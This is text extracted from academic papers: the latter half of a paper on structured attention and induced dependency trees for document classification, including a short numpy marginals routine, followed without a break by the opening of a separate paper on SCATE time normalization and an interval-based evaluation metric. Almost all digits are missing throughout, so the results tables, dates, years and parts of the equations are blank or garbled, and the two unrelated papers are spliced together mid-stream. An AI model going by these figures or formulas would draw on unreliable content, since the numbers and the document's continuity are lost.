let a denote a matrix depending on a real parameter x; assuming all component functions in a are differentiable, and a is invertible for all possible values, the gradient of a with respect respect to x is: da− dx = −a− da dx a− ( ) multiplication of the three matrices and matrix in- version can be computed efficiently on modern par- allel hardware architectures such as gpus. in our experiments, computation of structured attention takes only / of training time. experiments in this section we present our experiments for eval- uating the performance of our model. since sen- tence representations constitute the basic building blocks of our document model, we first evalu- ate the performance of structured attention on a sentence-level task, namely natural language infer- ence. we then assess the document-level repre- sentations obtained by our model on a variety of classification tasks representing documents of dif- ferent length, subject matter, and language. our code is available at https://github.com/ nlpyang/structured. . natural language inference the ability to reason about the semantic relation- ship between two sentences is an integral part of text understanding. we therefore evaluate our model on recognizing textual entailment, i.e., whether two premise-hypothesis pairs are entailing, con- tradictory, or neutral. for this task we used the stanford natural language inference (snli) dataset (bowman et al., ), which contains premise-hypothesis pairs and target labels indicat- ing their relation. after removing sentences with unknown labels, we obtained , pairs for train- ing, , for development and , for testing. sentence-level representations obtained by our model (with structured attention) were used to en- code the premise and hypothesis by modifying the model of parikh et al. ( ) as follows. let [x p , · · · ,x p n] and [xh , · · · ,xhm] be the input vectors for the premise and hypothesis, respectively. appli- cation of structured attention yields new vector rep- resentations [rp , · · · ,r p n] and [rh , · · · ,rhm]. then we combine these two vectors with inter-sentential attention, and apply an average pooling operation: oij = mlp(r p i ) t mlp(rhj ) ( ) r̄ p i = [r p i , m∑ j= exp(oij)∑m k= exp(oik) ] ( ) r̄hi = [r h i , m∑ i= exp(oij)∑m k= exp(okj) ] ( ) rp = n∑ i= g(r̄ p i ), r h = m∑ i= g(r̄hi ) ( ) where mlp() is a two-layer perceptron with a relu activation function. the new representa- tions rp,rh are then concatenated and fed into an- other two-layer perceptron with a softmax layer to obtain the predicted distribution over the labels. the hidden size of the lstm was set to . the dimensions of the semantic vector were and the dimensions of structure vector were . we used pretrained -d glove b (pennington et al., ) vectors to initialize the word embeddings. all parameters (including word embeddings) were up- dated with adagrad (duchi et al., ), and the models acc θ classifier with handcrafted features (bowman et al., ) . — d lstm encoders (bowman et al., ) . . m d stack-augmented parser-interpreter neural net (bowman et al., ) . . m d lstm with inter-attention (rocktäschel et al., ) . k d matching lstms (wang and jiang, ) . . m d lstmn with deep attention fusion (cheng et al., ) . . m decomposable attention over word embeddings (parikh et al., ) . k enhanced bilstm inference model (chen et al., ) . . m d no attention . k d simple intra-sentence attention . . m d structured intra-sentence attention with inside-outside . . 
m d structured intra-sentence attention with matrix inversion . . m table : test accuracy on the snli dataset and number of parameters θ (excluding embeddings). wherever available we also provide the size of the recurrent unit. models speed max avg no attention . . simple attention . . matrix inversion . . inside-outside . . table : comparison of speed of different models on the snli testset. the unit of measurement is seconds per instance. all results were obtained on a geforce gtx titan x (pascal) gpu. learning rate was set to . . the hidden size of the two-layer perceptron was set to and dropout was used with ratio . . the mini-batch size was . we compared our model (and variants thereof) against several related systems. results (in terms of -class accuracy) are shown in table . most pre- vious systems employ lstms and do not incorpo- rate a structured attention component. exceptions include cheng et al. ( ) and parikh et al. ( ) whose models include intra-attention encoding rela- tionships between words within each sentence (see equation ( )). it is also worth noting that some models take structural information into account in the form of parse trees (bowman et al., ; chen et al., ). the second block of table presents a version of our model without an intra-sentential at- tention mechanism as well as three variants with at- tention, assuming the structure of word-to-word re- dataset #class #docs #s/d #w/d yelp k . . imdb k . . cz movies k . . debates . k . . table : dataset statistics; #class is the number of classes per dataset, #docs denotes the number of documents; #s/d and #w/d represent the average number of sentences and words per document. lations and dependency trees. in the latter case we compare our matrix inversion based model against kim et al.’s ( ) inside-outside attention model. consistent with previous work (cheng et al., ; parikh et al., ), we observe that simple attention brings performance improvements over no attention. structured attention further enhances performance. our own model with tree matrix inversion slightly outperforms the inside-outside model of kim et al. ( ), overall achieving results in the same ball- park with related lstm-based models (chen et al., ; cheng et al., ; parikh et al., ). table compares the running speed of the mod- els shown in the second block of table . as can be seen matrix inversion does not increase running speed over the simpler attention mechanism and is considerably faster compared to inside-outside. the latter is – times slower than our model on the same platform. models yelp imdb cz movies debates θ feature-based classifiers . . . . — paragraph vector (tang et al., a) . . — —- — convolutional neural network (tang et al., a) . — — — — convolutional gated rnn (tang et al., a) . . — — — lstm gated rnn (tang et al., a) . . — — — rst-based recursive neural network (ji and smith, ) — — — . — d hierarchical attention networks (yang et al., ) . . . . k d no attention . . . . k d simple attention . . . . k d structured attention (sentence-level) . . . . k d structured attention (document-level) . . . . k d structured attention (both levels) . . . . k table : test accuracy on four datasets and number of parameters θ (excluding embeddings). regarding feature-based classification methods, results on yelp and imdb are taken from tang et al. ( a), on cz movies from brychcın and habernal ( ), and debates from yogatama and smith ( ). wherever available we also provide the size of the recurrent unit (lstm or gru). . 
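for concreteness, the marginal computation behind the structured-attention rows compared above can be rendered in a few lines of numpy; this is a single-sentence, unbatched sketch of the matrix-tree construction described earlier (zero-based indices, so word 1 is index 0), and the function name is illustrative. a practical implementation would batch the computation on the gpu and let automatic differentiation handle the gradient of the matrix inverse given earlier.

```python
import numpy as np

def tree_marginals(f, f_root):
    """f: (n, n) array of unnormalized scores f_ij (row i = head, column j = dependent);
    f_root: (n,) array of root scores. returns (p_edge, p_root), the marginal
    probabilities of dependency edges and of each word being the root."""
    n = f.shape[0]
    a = np.exp(f)
    np.fill_diagonal(a, 0.0)                  # no self-attachment
    laplacian = np.diag(a.sum(axis=0)) - a    # column sums on the diagonal, -A off-diagonal
    l_bar = laplacian.copy()
    l_bar[0, :] = np.exp(f_root)              # first row replaced by the root scores
    inv = np.linalg.inv(l_bar)
    p_edge = np.zeros((n, n))
    for i in range(n):
        for j in range(n):
            if i == j:
                continue
            first = 0.0 if j == 0 else a[i, j] * inv[j, j]
            second = 0.0 if i == 0 else a[i, j] * inv[j, i]
            p_edge[i, j] = first - second
    p_root = np.exp(f_root) * inv[:, 0]
    return p_edge, p_root
```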
document classification in this section, we evaluate our document-level model on a variety of classification tasks. we se- lected four datasets which we describe below. ta- ble summarizes some statistics for each dataset. yelp reviews were obtained from the yelp dataset challenge. this dataset contains restaurant reviews, each associated with human ratings on a scale from (negative) to (positive) which we used as gold labels for sentiment classification; we fol- lowed the preprocessing introduced in tang et al. ( a) and report experiments on their training, de- velopment, and testing partitions ( / / ). imdb reviews were obtained from diao et al. ( ), who randomly crawled reviews for k movies. each review is associated with user ratings ranging from to . czech reviews were obtained from brychcın and habernal ( ). the dataset contains reviews from the czech movie database each labeled as positive, neutral, or negative. we include czech in our exper- iments since it has more flexible word order com- pared to english, with non-projective dependency structures being more frequent. experiments on this dataset perform -fold cross-validation following previous work (brychcın and habernal, ). http://www.csfd.cz/ congressional floor debates were obtained from a corpus originally created by thomas et al. ( ) which contains transcripts of u.s. floor debates in the house of representatives for the year . each debate consists of a series of speech segments, each labeled by the vote (“yea” or “nay”) cast for the proposed bill by the the speaker of each segment. we used the pre-processed corpus from yogatama and smith ( ). following previous work (yang et al., ), we only retained words appearing more than five times in building the vocabulary and replaced words with lesser frequencies with a special unk to- ken. word embeddings were initialized by training word vec (mikolov et al., ) on the training and validation splits of each dataset. in our experiments, we set the word embedding dimension to be and the hidden size for the sentence-level and document- level lstms to (the dimensions of the semantic and structure vectors were set to and , respec- tively). we used a mini-batch size of during train- ing and documents of similar length were grouped in one batch. parameters were optimized with adagrad (duchi et al., ), the learning rate was set to . . we used l regularization for all parameters except word embeddings with regularization constant set to e− . dropout was applied on the input and output http://www.cs.cornell.edu/˜ainur/data. html three men drink at a reflective bar three men are socializing during happy hour premise hypothesis workers at basking robbins are filling orders workers filling orders at basking robbins figure : dependency trees induced by our model on the snli test set. layers with dropout rate . . our results are summarized in table . we com- pared our model against several related models cov- ering a wide spectrum of representations including word-based ones (e.g., paragraph vector and cnn models) as well as hierarchically composed ones (e.g., a cnn or lstm provides a sentence vector and then a recurrent neural network combines the sentence vectors to form a document level represen- tation for classification). previous state-of-the-art results on the three review datasets were achieved by the hierarchical attention network of yang et al. ( ), which models the document hierarchically with two grus and uses an attention mechanism to weigh the importance of each word and sentence. 
on the debates corpus, ji and smith ( ) obtained best results with a recursive neural network model operating on the output of an rst parser. table presents three variants of our model, one with struc- tured attention on the sentence level, another one with structured attention on the document level and a third model which employs attention on both levels. as can be seen, the combination is beneficial achiev- ing best results on three out of four datasets. further- more, structured attention is superior to the simpler word-to-word attention mechanism, and both types of attention bring improvements over no attention. the structured attention approach is also very effi- cient, taking only minutes for one training epoch on the largest dataset. . analysis of induced structures to gain further insight on structured attention, we inspected the dependency trees it produces. specifically, we used the chu-liu-edmonds algo- we do not report comparisons with the inside-outside ap- proach on document classification tasks due to its prohibitive computation cost leading to hours of training for one epoch. parser attention projective — . % height . . nodes depth . % . % depth . % . % depth . % . % depth . % . % depth . % . % depth . % . % same edges . % table : descriptive statistics for dependency trees produced by our model and the stanford parser (manning et al., ) on the snli test set. rithm (chu and liu, ; edmonds, ) to ex- tract the maximum spanning tree from the attention scores. we report various statistics on the character- istics of the induced trees across different tasks and datasets. we also provide examples of tree output, in an attempt to explain how our model uses depen- dency structures to model text. sentence trees we compared the dependency trees obtained from our model with those produced by a state-of-the-art dependency parser trained on the english penn treebank. table presents various statistics on the depth of the trees produced by our model on the snli test set and the stanford depen- dency parser (manning et al., ). as can be seen, the induced dependency structures are simpler com- pared to those obtained from the stanford parser. the trees are generally less deep (their height is . compared to . for the stanford parser), with the majority being of depth – . almost half of the induced trees have a projective structure, although there is nothing in the model to enforce this con- straint. we also calculated the percentage of head- dependency edges that are identical between the two yelp imdb cz movies debates projective . % . % . % . % height . . . . nodes depth . % . % . % . % depth . % . % . % . % depth . % . % . % . % depth . % . % . % . % table : descriptive statistics for induced document-level dependency trees across datasets. sets of trees. although our model is not exposed to annotated trees during training, a large number of edges agree with the output of the stanford parser. figure shows examples of dependency trees in- duced on the snli dataset. although the model is trained without ever being exposed to a parse tree, it is able to learn plausible dependency structures via the attention mechanism. overall we observe that the induced trees differ from linguistically mo- tivated ones in the types of dependencies they cre- ate which tend to be of shorter length. the depen- dencies obtained from structured attention are more direct as shown in the first premise sentence in fig- ure where words at and bar are directly connected to the verb drink. 
Such short, direct dependencies are perhaps to be expected, since the attention mechanism uses the dependency structures to collect information from other words, and direct links are more effective for this purpose.

Document trees. We also used the Chu-Liu-Edmonds algorithm to obtain document-level dependency trees. The table above summarizes various characteristics of these trees. For most datasets, document-level trees are not very deep, with most nodes at shallow depths. This is not surprising, as the documents are relatively short, with the exception of the debates, which are longer and whose induced trees are more complex. The fact that most documents exhibit simple discourse structures is further corroborated by the large proportion of projective trees induced on the Yelp, IMDB, and CZ Movies datasets. Unfortunately, our trees cannot be directly compared with the output of a discourse parser, which typically involves a segmentation process splitting sentences into smaller units; our trees are constructed over entire sentences, and there is currently no mechanism in the model to split sentences into discourse units.

[Figure: induced dependency trees for three documents, (a) and (b) taken from Yelp (a cafeteria-style barbecue restaurant review and a review of a Brazilian jiu-jitsu gym) and (c) from the Czech Movies dataset (a review of the parody Top Secret!, shown with its English translation).]

The figure above shows examples of document-level trees taken from Yelp and the Czech Movies dataset. In the first tree, most edges are instances of the "elaboration" discourse relation, i.e., the child presents additional information about the parent. The second tree is non-projective: some of the edges connecting its sentences cross. The third review, perhaps due to its colloquial nature, is not entirely coherent.
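The projectivity percentages reported above rest on a simple structural test: an arc is projective if every word lying strictly between a head and its dependent is dominated by that head, and a tree is projective if all of its arcs are. The sketch below shows one standard way to check this, assuming for illustration that trees are encoded as a list of head indices with -1 for the root.

def is_projective(heads):
    """heads[i] = index of the head of token i, or -1 if token i attaches to the root."""

    def ancestors(i):
        seen = set()
        while i != -1 and i not in seen:
            seen.add(i)
            i = heads[i]
        return seen

    for dep, head in enumerate(heads):
        if head == -1:
            continue
        lo, hi = sorted((dep, head))
        for between in range(lo + 1, hi):
            # every token strictly between head and dependent must be dominated
            # by the head, otherwise this arc crosses another arc
            if head not in ancestors(between):
                return False
    return True


print(is_projective([1, 2, -1, 2]))  # True: a small projective tree
print(is_projective([2, 3, -1, 2]))  # False: the arc 3->1 crosses the arc 2->0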
however, the model manages to link sen- tences and to sentence , i.e., the movie being discussed; it also relates sentence to , both of which express highly positive sentiment. conclusions in this paper we proposed a new model for rep- resenting documents while automatically learning rich structural dependencies. our model normalizes intra-attention scores with the marginal probabilities of a non-projective dependency tree based on a ma- trix inversion process. each operation in this pro- cess is differentiable and the model can be trained efficiently end-to-end, while inducing structural in- formation. we applied this approach to model doc- uments hierarchically, incorporating both sentence- and document-level structure. experiments on sen- tence and document modeling tasks show that the representations learned by our model achieve com- petitive performance against strong comparison sys- tems. analysis of the induced tree structures re- vealed that they are meaningful, albeit different from linguistics ones, without ever exposing the model to linguistic annotations or an external parser. directions for future work are many and varied. given appropriate training objectives (linzen et al., ), it should be possible to induce linguistically meaningful dependency trees using the proposed at- tention mechanism. we also plan to explore how document-level trees can be usefully employed in summarization, e.g., as a means to represent or even extract important content. acknowledgments the authors gratefully ac- knowledge the support of the european research council (award number ). we also thank the anonymous tacl reviewers and the action editor whose feedback helped improve the present paper, members of edinburghnlp for helpful discussions and suggestions, and barbora skarabela for translat- ing the czech document for us. references dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in proceed- ings of the iclr conference. james k. baker. . trainable grammars for speech recognition. the journal of the acousti- cal society of america (s ):s –s . regina barzilay and mirella lapata. . mod- eling local coherence: an entity-based approach. computational linguistics ( ): – . parminder bhatia, yangfeng ji, and jacob eisen- stein. . better document-level sentiment analysis from rst discourse parsing. in pro- ceedings of the emnlp conference. pages – . samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language in- ference. in proceedings of the emnlp confer- ence. pages – . samuel r. bowman, jon gauthier, abhinav ras- togi, raghav gupta, christopher d. manning, and christopher potts. . a fast unified model for parsing and sentence understanding. in proceed- ings of the acl conference. pages – . tomáš brychcın and ivan habernal. . unsu- pervised improving of sentiment analysis using global target context. in proceedings of the inter- national conference on recent advances in nat- ural language processing. pages – . lynn carlson, daniel marcu, and mary ellen okurowski. . building a discourse-tagged corpus in the framework of rhetorical structure theory. in proceedings of the second sigdial workshop on discourse and dialogue. qian chen, xiaodan zhu, zhen-hua ling, si wei, hui jiang, and diana inkpen. . enhanced lstm for natural language inference. in pro- ceedings of the acl conference. pages – . qian chen, xiaodan zhu, zhenhua ling, si wei, and hui jiang. . 
distraction-based neural networks for modeling documents. in proceed- ings of the ijcai conference. pages – . jianpeng cheng, li dong, and mirella lapata. . long short-term memory-networks for machine reading. in proceedings of the emnlp confer- ence. pages – . yoeng-jin chu and tseng-hong liu. . on shortest arborescence of a directed graph. scien- tia sinica ( ): . michał daniluk, tim rocktäschel, johannes welbl, and sebastian riedel. . frustratingly short attention spans in neural language modeling. pro- ceedings of the iclr conference . qiming diao, minghui qiu, chao-yuan wu, alexander j smola, jing jiang, and chong wang. . jointly modeling aspects, ratings and senti- ments for movie recommendation (jmars). in proceedings of the acm sigkdd conference. pages – . john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research (jul): – . jack edmonds. . optimum branchings. journal of research of the national bureau of standards b ( ): – . vanessa wei feng and graeme hirst. . text- level discourse parsing with rich linguistic fea- tures. in proceedings of the acl conference. pages – . alex graves, abdel-rahman mohamed, and geof- frey hinton. . speech recognition with deep recurrent neural networks. in proceedings of the ieee icassp conference. pages – . katsuhiko hayashi, tsutomu hirao, and masaaki nagata. . empirical comparison of depen- dency conversions for rst discourse trees. in pro-ceedings of the annual meeting of sigdial. page . tsutomu hirao, yasuhisa yoshida, masaaki nishino, norihito yasuda, and masaaki nagata. . single-document summarization as a tree knapsack problem. in proceedings of the emnlp conference. pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation ( ): – . yangfeng ji and noah smith. . neural dis- course structure for text categorization. in pro- ceedings of the acl conference. yoon kim, carl denton, luong hoang, and alexan- der m. rush. . structured attention networks. in proceedings of the iclr conference. terry koo, amir globerson, xavier carreras pérez, and michael collins. . structured prediction models via the matrix-tree theorem. in proceed- ings of the emnlp conference. pages – . alan lee, rashmi prasad, aravind joshi, nikhil di- nesh, and bonnie webber. . complexity of dependencies in discourse: are dependencies in discourse more complex than in syntax. in pro- ceedings of the international workshop on tree- banks and linguistic theories. page . sujian li, liang wang, ziqiang cao, and wenjie li. . text-level discourse dependency parsing. in proceedings of the acl conference. pages – . ziheng lin, hwee tou ng, and min-yen kan. . automatically evaluating text coherence using discourse relations. in proceedings of the acl conference. pages – . tal linzen, emmanuel dupoux, and yoav gold- berg. . assessing the ability of lstms to learn syntax-sensitive dependencies. transac- tions of the association for computational lin- guistics : – . yang liu and mirella lapata. . learning con- textually informed representations for linear-time discourse parsing. in proceedings of the emnlp conference. pages – . william c. mann and sandra a. thompson. . rhetorical structure theory: toward a functional theory of text organization. text-interdisciplinary journal for the study of discourse ( ): – . christopher d. manning, mihai surdeanu, john bauer, jenny rose finkel, steven bethard, and david mcclosky. . 
the stanford corenlp natural language processing toolkit. in pro- ceedings of the acl conference (system demon- strations). pages – . ryan mcdonald and giorgio satta. . on the complexity of non-projective data-driven depen- dency parsing. in proceedings of the th interna- tional conference on parsing technologies. pages – . igor a. melc̆uk. . dependency syntax: theory and practice. state university of new york press. mohsen mesgar and michael strube. . graph- based coherence modeling for assessing readabil- ity. in proceedings of the th joint conference on lexical and computational semantics. pages – . thomas meyer and bonnie webber. . im- plicitation of discourse connectives in (machine) translation. in proceedings of the workshop on discourse in machine translation. pages – . tomas mikolov, ilya sutskever, kai chen, greg s. corrado, and jeff dean. . distributed rep- resentations of words and phrases and their com- positionality. in proceedings of the nips confer- ence. pages – . alexander miller, adam fisch, jesse dodge, amir- hossein karimi, antoine bordes, and jason we- ston. . key-value memory networks for di- rectly reading documents. in proceedings of the emnlp conference. pages – . ankur parikh, oscar täckström, dipanjan das, and jakob uszkoreit. . a decomposable atten- tion model for natural language inference. in pro- ceedings of the emnlp conference. pages – . jeffrey pennington, richard socher, and christo- pher d. manning. . glove: global vectors for word representation. in proceedings of the emnlp conference. pages – . rashmi prasad, nikhil dinesh, alan lee, eleni miltsakaki, livio robaldo, aravind k. joshi, and bonnie l. webber. . the penn discourse treebank . . in lrec. tim rocktäschel, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, and phil blunsom. . reasoning about entailment with neural at- tention. in proceedings of the iclr conference. duyu tang, bing qin, and ting liu. a. doc- ument modeling with gated recurrent neural net- work for sentiment classification. in proceedings of the emnlp conference. pages – . duyu tang, bing qin, and ting liu. b. learn- ing semantic representations of users and prod- ucts for document level sentiment classification. in proceedings of the acl conference. pages – . louis tesniére. . éléments de syntaxe struc- turale. editions klincksieck. matt thomas, bo pang, and lillian lee. . get out the vote: determining support or opposition from congressional floor-debate transcripts. in proceedings of the emnlp conference. pages – . william thomas tutte. . graph theory. suzan verberne, lou boves, nelleke oostdijk, and peter-arno coppen. . discourse-based answering of why-questions. traitement au- tomatique des language, discours et document: traitements automatics ( ): – . shuohang wang and jing jiang. . learning nat- ural language inference with lstm. in proceed- ings of naacl conference. pages – . florian wolf and edward gibson. . coherence in natural language: data structures and appli- cations. the mit press. pengtao xie and eric p. xing. . integrating doc- ument clustering and topic modeling. in proceed- ings of the conference on uncertainty in artificial intelligence. pages – . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron courville, ruslan salakhudinov, rich zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual attention. in international conference on machine learning. pages – . zichao yang, diyi yang, chris dyer, xiaodong he, alex smola, and eduard hovy. . 
hierar- chical attention networks for document classifica- tion. in proceedings of the naacl conference. pages – . dani yogatama and noah a. smith. . linguis- tic structured sparsity in text categorization. in proceedings of the acl conference. pages – . from characters to time intervals: new paradigms for evaluation and neural parsing of time normalizations egoitz laparra∗ dongfang xu∗ steven bethard school of information university of arizona tucson, az {laparra,dongfangxu ,bethard}@email.arizona.edu abstract this paper presents the first model for time normalization trained on the scate corpus. in the scate schema, time expressions are annotated as a semantic composition of time entities. this novel schema favors machine learning approaches, as it can be viewed as a semantic parsing task. in this work, we propose a character level multi-output neural network that outperforms previous state-of-the-art built on the timeml schema. to compare predic- tions of systems that follow both scate and timeml, we present a new scoring metric for time intervals. we also apply this new metric to carry out a comparative analysis of the anno- tations of both schemes in the same corpus. introduction time normalization is the task of translating natural language expressions of time to computer-readable forms. for example, the expression three days ago could be normalized to the formal representation - - in the iso- standard. as time nor- malization allows entities and events to be placed along a timeline, it is a crucial step for many informa- tion extraction tasks. since the first shared tasks on time normalization (verhagen et al., ), interest in the problem and the variety of applications have been growing. for example, lin et al. ( ) use normal- ized timestamps from electronic medical records to contribute to patient monitoring and detect potential causes of disease. vossen et al. ( ) identify multi- lingual occurrences of the same events in the news ∗these two authors contributed equally. by, among other steps, normalizing time-expressions in different languages with the same iso standard. fischer and strötgen ( ) extract and normalize time-expressions from a large corpus of german fic- tion as the starting point of a deep study on trends and patterns of the use of dates in literature. a key consideration for time normalization sys- tems is what formal representation the time expres- sions should be normalized to. the most popular scheme for annotating normalized time expressions is iso-timeml (pustejovsky et al., a; puste- jovsky et al., ), but it is unable to represent several important types of time expressions (e.g., a bounded set of intervals, like saturdays since march ) and it is not easily amenable to machine learning (the rule-based heideltime (strötgen et al., ) still yields state-of-the-art performance). bethard and parker ( ) proposed an alternate scheme, se- mantically compositional annotation of time ex- pressions (scate), in which times are annotated as compositional time entities (figure ), and suggested that this should be more amenable to machine learn- ing. however, while they constructed an annotated corpus, they did not train any automatic models on it. we present the first machine-learning models trained on the scate corpus of time normalizations. we make several contributions in the process: • we introduce a new evaluation metric for time normalization that can compare normalized times from different annotation schemes by mea- suring overlap of intervals on the timeline. 
• we use the new metric to compare scate and timeml annotations on the same corpus, and confirm that scate covers a wider variety of transactions of the association for computational linguistics, vol. , pp. – , . action editor: mona diab. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. this interval repeating-intervals day-of-week type=saturday saturdays between start-interval end-interval=doc-time since last interval=doc-time repeating-interval month-of-year type=march sub-interval march day-of-month value= figure : annotation of the expression saturdays since march following the scate schema. time expressions. • we develop a recurrent neural network for learn- ing scate-style time normalization, and show that our model outperforms the state-of-the-art heideltime (strötgen et al., ). • we show that our character-based multi-output neural network architecture outperforms both word-based and single-output models. background iso-timeml (pustejovsky et al., a; pustejovsky et al., ) is the most popular scheme for annotat- ing time expressions. it annotates time expressions as phrases, and assigns an iso normalization (e.g., - - t : or pt h) as the value at- tribute of the normalized form. iso-timeml is used in several corpora, including the timebank (puste- jovsky et al., b), wikiwars (mazur and dale, ), timen (llorens et al., ), and the temp- eval shared tasks (verhagen et al., ; verhagen et al., ; uzzaman et al., ). however, the iso-timeml schema has a few drawbacks. first, times that align to more than a single calendar unit (day, week, month, etc.), such as saturdays since march (where multiple satur- days are involved), cannot be described in the iso format since they do not correspond to any pre- fix of yyyy-mm-ddthh:mm:ss. second, each time expression receives a single value, regardless of the word span, the compositional semantics of the expression are not represented. for example, in the expressions since last week and since march , the semantics of since are identical – find the inter- val between the anchor time (last week or march ) and now. but iso-timeml would have to annotate these two phrases independently, with no way to in- dicate the shared portion of their semantics. these drawbacks of iso-timeml, especially the lack of compositionality, make the development of machine learning models difficult. thus, most prior work has taken a rule-based approach, looking up each token of a time expression in a normalization lexicon and then mapping this sequence of lexical entries to the normalized form (strötgen and gertz, ; bethard, ; lee et al., ; strötgen and gertz, ). as an alternative to timeml, and inspired by pre- vious works, schilder ( ) and han and lavie ( ), bethard and parker ( ) proposed seman- tically compositional annotation of time expres- sions (scate). in the scate schema, each time expression is annotated in terms of compositional time entity over intervals on the timeline. an ex- ample is shown in figure , with every annotation corresponding to a formally defined time entity. for instance, the annotation on top of since corresponds to a between operator that identifies an interval starting at the most recent march and ending at the document creation time (dct). the between operator is formally defined as: between([t , t ): interval, [t , t ): interval): interval = [t , t ). 
The SCATE schema can represent a wide variety of time expressions, and it provides a formal definition of the semantics of each annotation. Unlike TimeML, SCATE uses a graph structure to capture compositional semantics and can represent time expressions that are not expressed as contiguous phrases. The schema also has the advantage that it can be viewed as a semantic parsing task and, consequently, is more suitable for machine-learning approaches. However, Bethard and Parker ( ) present only a corpus; they do not present any models for semantic parsing.

An interval-based evaluation metric for normalized times

Before attempting to construct machine-learned models from the SCATE corpus, we were interested in evaluating Bethard and Parker ( )'s claim that the SCATE schema is able to represent a wider variety of time expressions than TimeML. To do so, we propose a new evaluation metric to compare time normalizations annotated both in the ISO format of TimeML and in the time-entity format of SCATE. This new evaluation interprets normalized annotations as intervals along the timeline and measures the overlap of those intervals.

TimeML TIMEX (time expression) annotations are converted to intervals following the ISO semantics of their value attribute. A date value, for example, is converted to the 24-hour interval starting at the first second of that day and ending just before the first second of the following day. SCATE annotations are converted to intervals following the formal semantics of each entity, using the library provided by Bethard and Parker ( ). For example, Next(Year( ), SimplePeriod(Years, )), the years following a given year, is converted to the corresponding interval on the timeline. Note that there may be more than one interval associated with a single annotation, as in the "Saturdays since March" example. Once all annotations have been converted into intervals along the timeline, we can measure how much the intervals of different annotations overlap.

Given two sets of intervals, we define the interval precision, P_int, as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the first set. Interval recall, R_int, is defined as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the second set. Formally:

I_S \sqcap I_H = \{ i \cap j : i \in I_S \wedge j \in I_H \}

P_{int}(I_S, I_H) = \frac{\sum_{i \in \mathrm{compact}(I_S \sqcap I_H)} |i|}{\sum_{i \in I_S} |i|}

R_{int}(I_S, I_H) = \frac{\sum_{i \in \mathrm{compact}(I_S \sqcap I_H)} |i|}{\sum_{i \in I_H} |i|}

where I_S and I_H are sets of intervals, i ∩ j is the (possibly empty) interval in common between the intervals i and j, |i| is the length of the interval i, and compact takes a set of intervals and merges any overlapping intervals. Given two sets of annotations (e.g., one each from two time normalization systems), we define the overall precision, P, as the average of interval precisions where each annotation from the first set is paired with all annotations that textually overlap it in the second set. Overall recall is defined as the average of interval recalls where each annotation from the second set is paired with all annotations that textually overlap it in the first set.
Formally:

O_I^a(B) = \bigcup_{b \in B : \mathrm{overlaps}(a, b)} \mathrm{intervals}(b)

P(S, H) = \frac{1}{|S|} \sum_{s \in S} P_{int}(\mathrm{intervals}(s), O_I^s(H))

R(S, H) = \frac{1}{|H|} \sum_{h \in H} R_{int}(\mathrm{intervals}(h), O_I^h(S))

where S and H are sets of annotations, intervals(x) gives the time intervals associated with the annotation x, and overlaps(a, b) decides whether the annotations a and b share at least one character of text in common. It is important to note that these metrics can be applied only to time expressions that yield bounded intervals. Time expressions that refer to intervals with undefined boundaries are out of scope, as in "it takes just a minute" or "I work every Saturday".

Data analysis

TimeML vs. SCATE

Both TimeML and SCATE annotations are available for a subset of the TempEval corpus (UzZaman et al., ), which contains a collection of news articles from different sources such as the Wall Street Journal, the New York Times, Cable News Network, and Voice of America. A table reports the statistics of the data.

[Table: number of documents and sentences, TimeML TIMEX annotations, and SCATE annotations (entities, time expressions, and bounded time expressions) for the AQUAINT, TimeBank, and test portions of the TempEval corpus annotated with both schemas.]

[Table: comparison of TimeML and SCATE annotations on AQUAINT and TimeBank, reporting precision, recall, and F1 over the body text and over all text.]
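Before looking at the data, the interval computations defined above can be sketched in a few lines. The following is a minimal illustration, not the official scorer; intervals are represented simply as (start, end) pairs of datetimes, and the example values are made up.

from datetime import datetime


def compact(intervals):
    """Merge overlapping intervals so no stretch of the timeline is counted twice."""
    merged = []
    for start, end in sorted(intervals):
        if merged and start <= merged[-1][1]:
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged


def total_length(intervals):
    return sum((end - start).total_seconds() for start, end in intervals)


def pairwise_intersection(set_a, set_b):
    """The non-empty intersections of every pair of intervals drawn from the two sets."""
    out = []
    for a_start, a_end in set_a:
        for b_start, b_end in set_b:
            start, end = max(a_start, b_start), min(a_end, b_end)
            if start < end:
                out.append((start, end))
    return out


def interval_precision(system_intervals, human_intervals):
    common = compact(pairwise_intersection(system_intervals, human_intervals))
    return total_length(common) / total_length(system_intervals)


def interval_recall(system_intervals, human_intervals):
    common = compact(pairwise_intersection(system_intervals, human_intervals))
    return total_length(common) / total_length(human_intervals)


# A system interval covering one day, scored against a gold interval covering two days.
system = [(datetime(2016, 1, 26), datetime(2016, 1, 27))]
gold = [(datetime(2016, 1, 26), datetime(2016, 1, 28))]
print(interval_precision(system, gold))  # 1.0
print(interval_recall(system, gold))     # 0.5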
scate has the same semantics for “last year”, but recog- nizes that “a year ago” has different semantics: a period centered at one year prior to the dct. under scate, “a year ago” refers to the interval [ - - t : , - - t : ). beyond these differences in interpretation, we also observed that, while the scate corpus annotates time expressions anywhere in the document (includ- ing in metadata), the timebank timex annotations are restricted to the main text of the documents. the second row of table shows the evaluation when comparing overall text in the document, not just the body text. unsurprisingly, timeml has a lower re- call of the time intervals from the scate annotations under this evaluation. . types of scate annotations studying the training and development portion of the dataset, we noticed that the scate annotations can be usefully divided into three categories: non- operators, explicit operators, and implicit operators. we define non-operators as numbers, periods (e.g., three months), explicit intervals (e.g., years like ), and repeating intervals (day-of-weeks like friday, month-of-years like january, etc.). non-operators are basically atomic; they can be in- non-op exp-op imp-op total % % % % table : distribution of time entity annotations in aquaint+timebank. terpreted without having to refer to other annotations. operators are not atomic; they can only be interpreted with respect to other annotations they link to. for example, the this operator in figure can only be interpreted by first interpreting the day-of-week non-operator and the between operator that it links to. we split operators into two types: explicit and implicit. we define an operator as explicit if it does not overlap with any other annotation. this occurs, for example, when the time connective since evokes the between operator in figure . an operator is considered to be implicit if it overlaps with an- other annotation. this occurs, for example, with the last operator in figure , where march implies last march, but there is no explicit signal in the text, and it must be inferred from context. we study how these 